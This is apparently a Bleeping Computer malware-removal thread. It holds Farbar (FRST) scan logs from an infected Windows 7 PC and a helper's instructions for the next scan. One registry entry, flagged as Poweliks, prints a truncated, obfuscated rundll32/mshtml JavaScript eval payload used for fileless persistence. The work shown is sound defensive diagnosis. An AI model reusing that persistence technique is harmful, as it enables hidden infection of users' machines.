2014-10-15 13:56 - 2014-07-06 21:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 13:56 - 2014-07-06 21:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 13:56 - 2014-07-06 21:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 13:56 - 2014-07-06 21:28 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 13:56 - 2014-06-27 20:21 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 13:56 - 2014-06-27 20:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 13:56 - 2014-06-27 20:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-01 09:16 - 2014-09-24 21:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 10:00 - 2011-03-21 11:19 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-28 10:00 - 2010-12-29 18:48 - 00073034 _____ () C:\Windows\PFRO.log
2014-10-28 10:00 - 2009-07-14 00:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-28 10:00 - 2009-07-14 00:39 - 00093295 _____ () C:\Windows\setupact.log
2014-10-28 09:59 - 2010-10-16 12:07 - 01671214 _____ () C:\Windows\WindowsUpdate.log
2014-10-28 09:57 - 2009-07-13 22:04 - 00000215 _____ () C:\Windows\system.ini
2014-10-28 09:42 - 2014-06-04 10:57 - 00000556 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job
2014-10-28 09:38 - 2012-08-29 09:07 - 00002131 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-28 09:38 - 2011-03-21 11:19 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-28 09:16 - 2012-04-03 09:22 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-27 17:26 - 2009-07-14 00:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-27 17:26 - 2009-07-14 00:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-27 17:25 - 2009-07-25 08:54 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-27 17:20 - 2012-05-01 10:33 - 00000000 ___RD () C:\Users\KELI\Dropbox
2014-10-27 17:19 - 2012-05-01 10:32 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Dropbox
2014-10-27 16:37 - 2009-07-13 22:37 - 00000000 ___RD () C:\Users\Public
2014-10-27 15:49 - 2014-06-04 10:56 - 00000000 ____D () C:\Users\KELI\AppData\Local\Citrix
2014-10-27 09:28 - 2012-01-10 10:25 - 00000316 _____ () C:\Windows\Tasks\HPCeeScheduleForKELI.job
2014-10-23 11:03 - 2009-07-14 00:52 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-10-22 09:16 - 2010-10-16 12:11 - 00000000 ____D () C:\ProgramData\PDFC
2014-10-16 11:53 - 2010-12-29 18:49 - 00000000 ____D () C:\Scans
2014-10-16 10:24 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\rescache
2014-10-16 09:58 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 09:27 - 2012-01-17 10:31 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-10-16 09:27 - 2011-04-12 09:27 - 00000052 _____ () C:\Windows\system32\DOErrors.log
2014-10-16 09:13 - 2009-07-14 00:33 - 00401032 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 09:12 - 2014-05-06 16:59 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 16:55 - 2013-08-14 17:10 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 16:52 - 2011-03-21 09:13 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 15:53 - 2011-03-21 11:46 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

Some content of TEMP:
====================
C:\Users\KELI\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpyafstv.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-27 18:50

==================== End Of Log ============================

 

 



#2 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:11 AM

Posted 28 October 2014 - 02:23 PM

Hi & welcome to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your malware-related problems.

Before we move on, please read the following points carefully:
  • My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are following my instructions, stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
Step 1


Start FRST with administrator privileges.
  • Make sure the following option is checked: addition.png
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 

#3 ScotDesort

ScotDesort
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:11 AM

Posted 29 October 2014 - 08:18 AM

FRST.LOG

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 27-10-2014 01
Ran by KELI (administrator) on ATTY-2 on 28-10-2014 10:01:43
Running from C:\Users\KELI\Desktop
Loaded Profile: KELI (Available profiles: KELI)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files\Intel\AMT\LMS.exe
(PDF Complete Inc) C:\Program Files\PDF Complete\pdfsvc.exe
(Protexis Inc.) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
() C:\Program Files\SiteAdvisor\6173\SAService.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\PrintIsolationHost.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.exe
() C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(KYOCERA MITA Corporation) C:\Program Files\Kyocera\FileUtility\NsCatCom.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Reader 10.0\Reader\reader_sl.exe
(Dropbox, Inc.) C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Google) C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7596576 2009-07-02] (Realtek Semiconductor)
HKLM\...\Run: [picon] => C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [796696 2009-07-24] (Intel Corporation)
HKLM\...\Run: [PDF Complete] => C:\Program Files\PDF Complete\pdfsty.exe [563736 2009-06-18] (PDF Complete Inc)
HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM\...\Run: [MVS Splash] => C:\Program Files\McAfee\Managed VirusScan\Agent\Splash.exe [562496 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [McAfee Managed Services Tray] => C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe [95552 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [SiteAdvisor] => C:\Program Files\SiteAdvisor\6173\SiteAdv.exe [36640 2007-08-28] ()
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-03-21] (Google Inc.)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Scanner File Utility.lnk
ShortcutTarget: Scanner File Utility.lnk -> C:\Program Files\Kyocera\FileUtility\NsCatCom.exe (KYOCERA MITA Corporation)
Startup: C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPCOM/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: No Name -> {089FD14D-132B-48FC-8861-0048AE113215} -> C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Bing Bar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - @C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: myrm - {4D034FC3-013F-4b95-B544-44D49ABE3E76} - C:\Program Files\McAfee\Managed VirusScan\Agent\myRmProt4.9.2.358.dll (McAfee, Inc.)
Handler: siteadvisor - {3A5DC592-7723-4EAA-9EE6-AF4222BCF879} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Tcpip\..\Interfaces\{47CED9F3-6727-4E66-BBD7-559438BB948D}: [NameServer] 167.206.245.130,167.206.245.129
 
FireFox:
========
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @Microsoft.com/NpWinExt,version=5.0 -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\KELI\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox
FF Extension: Bing Bar - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: Default Manager - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2010-10-16]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Bing Bar) - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
CHR Profile: C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-18]
CHR Extension: (Google Wallet) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-04-01]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 EngineServer; C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe [14144 2009-06-02] (McAfee, Inc.)
S2 HP Support Assistant Service; C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S4 McShield; C:\Program Files\McAfee\Managed VirusScan\VScan\McShield.exe [144704 2009-06-02] (McAfee, Inc.)
S4 myAgtSvc; C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe [221024 2009-11-17] (McAfee, Inc.)
R2 pdfcDispatcher; C:\Program Files\PDF Complete\pdfsvc.exe [635416 2009-06-18] (PDF Complete Inc)
R2 SiteAdvisor Service; C:\Program Files\SiteAdvisor\6173\SAService.exe [341280 2010-10-16] ()
R2 UNS; C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-24] (Intel Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-27] (Malwarebytes Corporation)
S3 MfeAVFK; C:\Windows\System32\drivers\MfeAVFK.sys [79816 2009-05-15] (McAfee, Inc.)
S3 MfeBOPK; C:\Windows\System32\drivers\MfeBOPK.sys [35272 2009-05-15] (McAfee, Inc.)
R1 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [214024 2009-05-15] (McAfee, Inc.)
S3 MfeRKDK; C:\Windows\System32\drivers\MfeRKDK.sys [34248 2009-05-15] (McAfee, Inc.)
R1 mfetdik; C:\Windows\System32\drivers\mfetdik.sys [55336 2009-05-15] (McAfee, Inc.)
R3 vpcbus; C:\Windows\System32\DRIVERS\vpchbus.sys [172416 2010-11-20] (Microsoft Corporation)
R1 vpcnfltr; C:\Windows\System32\DRIVERS\vpcnfltr.sys [48128 2010-11-20] (Microsoft Corporation)
R3 vpcusb; C:\Windows\System32\DRIVERS\vpcusb.sys [78336 2010-11-20] (Microsoft Corporation)
R1 vpcvmm; C:\Windows\System32\drivers\vpcvmm.sys [296064 2010-11-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\KELI\AppData\Local\Temp\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-28 09:58 - 2014-10-28 09:58 - 00047174 _____ () C:\ComboFix.txt
2014-10-28 09:48 - 2014-10-28 09:58 - 00000000 ____D () C:\Qoobox
2014-10-28 09:48 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-28 09:48 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-28 09:48 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-28 09:46 - 2014-10-28 09:48 - 01998336 _____ () C:\Users\KELI\Downloads\AdwCleaner.exe
2014-10-28 09:45 - 2014-10-28 09:44 - 05591695 ____R (Swearware) C:\Users\KELI\Desktop\ComboFix.exe
2014-10-28 09:43 - 2014-10-28 09:44 - 05591695 _____ (Swearware) C:\Users\KELI\Downloads\ComboFix.exe
2014-10-28 09:24 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (1).exe
2014-10-28 09:23 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller.exe
2014-10-27 17:24 - 2014-10-27 17:24 - 00003189 _____ () C:\Users\KELI\Desktop\Sophos Virus Removal Tool.lnk
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Program Files\Sophos
2014-10-27 17:18 - 2014-10-27 17:19 - 00000000 ____D () C:\NPE
2014-10-27 16:54 - 2014-10-27 17:21 - 00000000 ____D () C:\Users\KELI\AppData\Local\NPE
2014-10-27 16:54 - 2014-10-27 16:54 - 00000000 ____D () C:\ProgramData\Norton
2014-10-27 16:53 - 2014-10-27 16:56 - 103020744 _____ (Sophos Limited) C:\Users\KELI\Downloads\Sophos Virus Removal Tool.exe
2014-10-27 16:52 - 2014-10-27 16:53 - 03060320 ____N (Symantec Corporation) C:\Users\KELI\Downloads\NPE.exe
2014-10-27 16:16 - 2014-10-28 09:45 - 00000000 ____D () C:\Windows\erdnt
2014-10-27 16:12 - 2014-10-27 16:13 - 00025282 _____ () C:\Users\KELI\Desktop\Addition.txt
2014-10-27 16:11 - 2014-10-28 10:02 - 00013066 _____ () C:\Users\KELI\Desktop\FRST.txt
2014-10-27 16:11 - 2014-10-28 10:01 - 00000000 ____D () C:\FRST
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT.exe
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT (1).exe
2014-10-27 16:07 - 2014-10-27 16:07 - 01104896 _____ (Farbar) C:\Users\KELI\Downloads\FRST.exe
2014-10-27 16:07 - 2014-10-27 16:07 - 01104896 _____ (Farbar) C:\Users\KELI\Desktop\FRST.exe
2014-10-27 15:28 - 2014-10-27 16:41 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:28 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-27 15:28 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-22 12:44 - 2014-10-22 17:04 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-10-22 12:44 - 2014-10-22 12:44 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-10-15 13:57 - 2014-10-09 21:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:57 - 2014-10-09 21:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:57 - 2014-10-09 21:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:57 - 2014-10-06 22:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:57 - 2014-09-28 20:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:57 - 2014-09-25 18:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:57 - 2014-09-25 18:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:57 - 2014-09-25 18:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:57 - 2014-09-18 21:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:57 - 2014-09-18 21:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:57 - 2014-09-18 21:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:57 - 2014-09-18 21:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:57 - 2014-09-18 21:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:57 - 2014-09-18 20:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:57 - 2014-09-18 20:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:57 - 2014-09-18 20:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:57 - 2014-09-18 20:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:57 - 2014-09-18 20:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:57 - 2014-09-18 20:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:57 - 2014-09-18 20:50 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:57 - 2014-09-18 20:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:57 - 2014-09-18 20:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:57 - 2014-09-18 20:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:57 - 2014-09-18 20:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
